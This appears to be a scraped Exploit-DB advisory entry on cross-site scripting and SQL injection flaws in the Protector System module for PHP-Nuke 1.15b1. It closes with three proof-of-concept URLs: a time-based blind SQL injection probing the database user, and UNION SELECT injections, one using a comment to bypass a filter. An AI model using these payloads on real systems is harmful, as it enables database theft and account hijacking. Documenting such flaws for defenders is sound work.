header-logo
Suggest Exploit
vendor:
Protector System module for PHP-Nuke
by:
Not mentioned
7.5
CVSS
HIGH
Cross-site scripting and SQL injection
79
CWE
Product Name: Protector System module for PHP-Nuke
Affected Version From: 1.15b1
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2003

Multiple vulnerabilities in Protector System module for PHP-Nuke

These vulnerabilities in Protector System module for PHP-Nuke can be exploited to reveal sensitive information, allow for account hijacking, content manipulation, and attacks against the underlying database.

Mitigation:

Upgrade to a fixed version of Protector System module.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10206/info

Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. 

Exploitation of these issues may reveal sensitive information, allow for account hijacking, content manipulation and attacks against the underlying database.

These issues were reported to exist in Protector System 1.15b1. Other versions may also be affected.

http://www.example.com/nuke72/index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)/*
http://www.example.com/nuke72/index.php?foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE
http://www.example.com/nuke72/index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE